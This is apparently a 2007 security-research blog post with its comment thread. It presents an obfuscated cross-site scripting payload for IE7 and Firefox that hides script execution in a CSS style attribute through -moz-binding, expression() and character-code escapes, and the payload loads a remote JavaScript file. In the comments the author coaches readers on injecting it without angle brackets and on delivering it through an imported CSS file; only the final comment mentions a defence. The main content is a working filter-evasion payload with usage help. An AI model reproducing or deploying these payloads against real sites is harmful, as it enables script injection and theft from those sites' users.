Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.
Credits update
The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one Dan sorry about missing you from the credits.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
Please use my tool Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.
Comments 28
here are the sources
xx: e\xp\re\s\s\i\o\n((window.r!=1) ? val(’x=String.fromCharCode;
scr=document.createElement(x(115,99,114,105,112,116));
scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,98,117,115,105,110,101,115,115,105,110,102,111,46,99,111,46,117,107,47,108,97,98,115,47,120,115,115,47,120,115,115,46,106,115));
document.getElementById(x(105,110,106,101,99,116)).appendChild(scr);
window.r=1;’)
n1
Posted 26 Nov 2007 at 3:59 pm ¶Hackvertor can now reconstruct this attack using the tag XSS->mozbindingexpression
and even add the backslashes for you
Posted 26 Nov 2007 at 4:21 pm ¶Filter evasion->backslashesc
Very interesting,
Posted 26 Nov 2007 at 9:32 pm ¶another great Job Gareth !!
wow!
Posted 28 Nov 2007 at 7:09 am ¶very nice work
how do you use this code for xss ?
Eliena
Posted 02 Dec 2007 at 10:45 am ¶You need to remove the line breaks and the code requires an id=”inject” to work on IE7. It can be injected within most HTML tags using the style attribute.
Posted 02 Dec 2007 at 10:48 am ¶So, its main advantage is on sites that filter “script” tags. You still need to pass “<” and “>” right?
Posted 03 Dec 2007 at 12:22 am ¶Nope you don’t need “<” or “>” to use this injection, you just need a style attribute to inject.
Posted 03 Dec 2007 at 6:42 am ¶Many thanks for the credit for the window.r trick. I hope I didn’t sound like I was specifically asking for credit on slackers- I was just trying to find out If I had come across the same trick as someone else or if it was an original idea. Nonetheless, I really appreciate the mention!
An damn, is that fine or what?! Nice work with that injection. A beautiful thing…
-Dan
Posted 10 Dec 2007 at 10:53 pm ¶Hey Dan no probs you contributed to the above vector so you deserve credit
Posted 11 Dec 2007 at 6:48 am ¶<script>alert(”test”)</script>
Posted 11 Jan 2008 at 4:35 pm ¶@l0ad1ng_x
LOL!
Posted 11 Jan 2008 at 5:38 pm ¶Can you please show us the source of this xss before it was “hackvectoreted”. I guess that’s here there but I just don’t find any way to reverse it.
Thanks
Posted 16 Jan 2008 at 8:29 pm ¶PS. Nice work you guys
Found some interesting thing here regarding this matter: hxxp://www.seo-blackhat.com/xss-cheat-sheet/
Posted 16 Jan 2008 at 8:30 pm ¶Sorry for the mess but don’t know to edit my post | guess that’s HEX there but I just don’t find any way to reverse it. |*
Posted 16 Jan 2008 at 8:32 pm ¶@no.connexion
Hackvertor can also decode data you know
I’ve decoded it for you can provide the code so you can enter you’re own:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php?input=PGRpdiBzdHlsZT0iXC1cbW9celwtYlxpXG5kXGluXGc6XHVybCgvL2J1c2luZXNzXGlcbmZvLmNvLnVrXC9sYWJzXC94YmxcL3hibFwueG1sXCN4c3MpOzxAaGV4X2VudD54eDogZVx4cFxyZVxzXHNcaVxvXG4oKHdpbmRvdy5yIT0xKSA%2FIGV2YWwoJ3g9U3RyaW5nLmZyb21DaGFyQ29kZTtzY3I9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCh4KDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTtzY3Iuc2V0QXR0cmlidXRlKHgoMTE1LDExNCw5OSkseCg8QHRvY2hhcmNvZGVzPmh0dHA6Ly9idXNpbmVzc2luZm8uY28udWsvbGFicy94c3MveHNzLmpzPEAvdG9jaGFyY29kZXM%2BKSk7ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoeCggMTA1LDExMCwxMDYsMTAxLDk5LDExNiApKS5hcHBlbmRDaGlsZChzY3IpO3dpbmRvdy5yPTE7Jyk8QC9oZXhfZW50PiA6IDEpOyIgaWQ9ImluamVjdCI%2BdGVzdDwvZGl2Pg%3D%3D
Hackvertor also has XSS tags which allow you to construct this vector, goto Hackvertor->XSS->mozbindingexpression
Posted 17 Jan 2008 at 12:13 am ¶Thanks for answer. Is it possible to use this XSS through a css file? What I’ve tryed to do is to insert <link href=”hxxp://wwwexample.com/css/xss.css”> and then <div class=”somename” style=”" id=”inject”>test</div> in html and the xss.css should look like <<< .sometext {
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);x&#…1;') : 1);
} >>>
or maybe something like that: body {
background-image: url(’javascript:alert(”XSS”);’)
}
None of the above worked … maybe I doing smthing wrong way or it’s just not going to work.
Posted 18 Jan 2008 at 2:33 am ¶@no.connexion
Yeah it’s possible to use it through a CSS file. In the file you need to define the rule as :-
body {
//code here
}
Then simply insert as a normal CSS through link or @import
Posted 18 Jan 2008 at 9:17 am ¶Thanks for response.
Here are my final thoughts.
Added in html the following:
…
<style type=”text/css”>
@import url(http://www.example.com/css/test.css);
</style>
</head>
<body>
<b> This IS a test </b>
</body>
…
and the in test.css:
…
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);<@hex_ent>xx: e\xp\re\s\s\i\o\n((window.r!=1) ? eval(’x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(<@tocharcodes>http://businessinfo.co.uk/labs/xss/xss.js<@/tocharcodes>));document.getElementById(x( 105,110,106,101,99,116 )).appendChild(scr);window.r=1;’)<@/hex_ent> : 1);
}
…
OR
in test.css
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
AND it works fine for Firefox but IE70 does nothing. I’m using 7.0.5730.13.
Posted 18 Jan 2008 at 2:50 pm ¶@no.connexion
Dude you need to run “convert” in Hackvertor first before adding it to the page.
Posted 18 Jan 2008 at 3:30 pm ¶I guess I was using the converted version in my css here:
b
{
\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss);&#x *** x27) : 1);
}
I didn’t use all the converted code for obvious reasons. Can you please confirm that you’ve done this through css and it works ? If yes I’ll stop asking and I’ll work my ass to make this work.
Posted 18 Jan 2008 at 3:55 pm ¶Yep tested on IE and Firefox
Posted 18 Jan 2008 at 3:57 pm ¶Please take a look in here:
Posted 20 Jan 2008 at 3:02 am ¶hxxp://noconnexion.wordpress.com/
coo000lllL :::::::: good work
Posted 02 Sep 2008 at 4:59 am ¶Firefox 3 fixed this xml hole?
Posted 09 Oct 2008 at 7:16 pm ¶Yeah it’s fixed in FF3 final, I think the beta it was still in but they removed it
I thought it was possible to do it inline but Giorgio mentioned it’s only available in chrome
Posted 09 Oct 2008 at 8:03 pm ¶how can you stop people from writing these type of attacks to a css file when allowing people to write there own css files on your server?
Posted 13 Jan 2010 at 4:43 am ¶@sim
Validate the CSS using a CSS parser like anti-samy
Posted 13 Jan 2010 at 1:23 pm ¶Post a Comment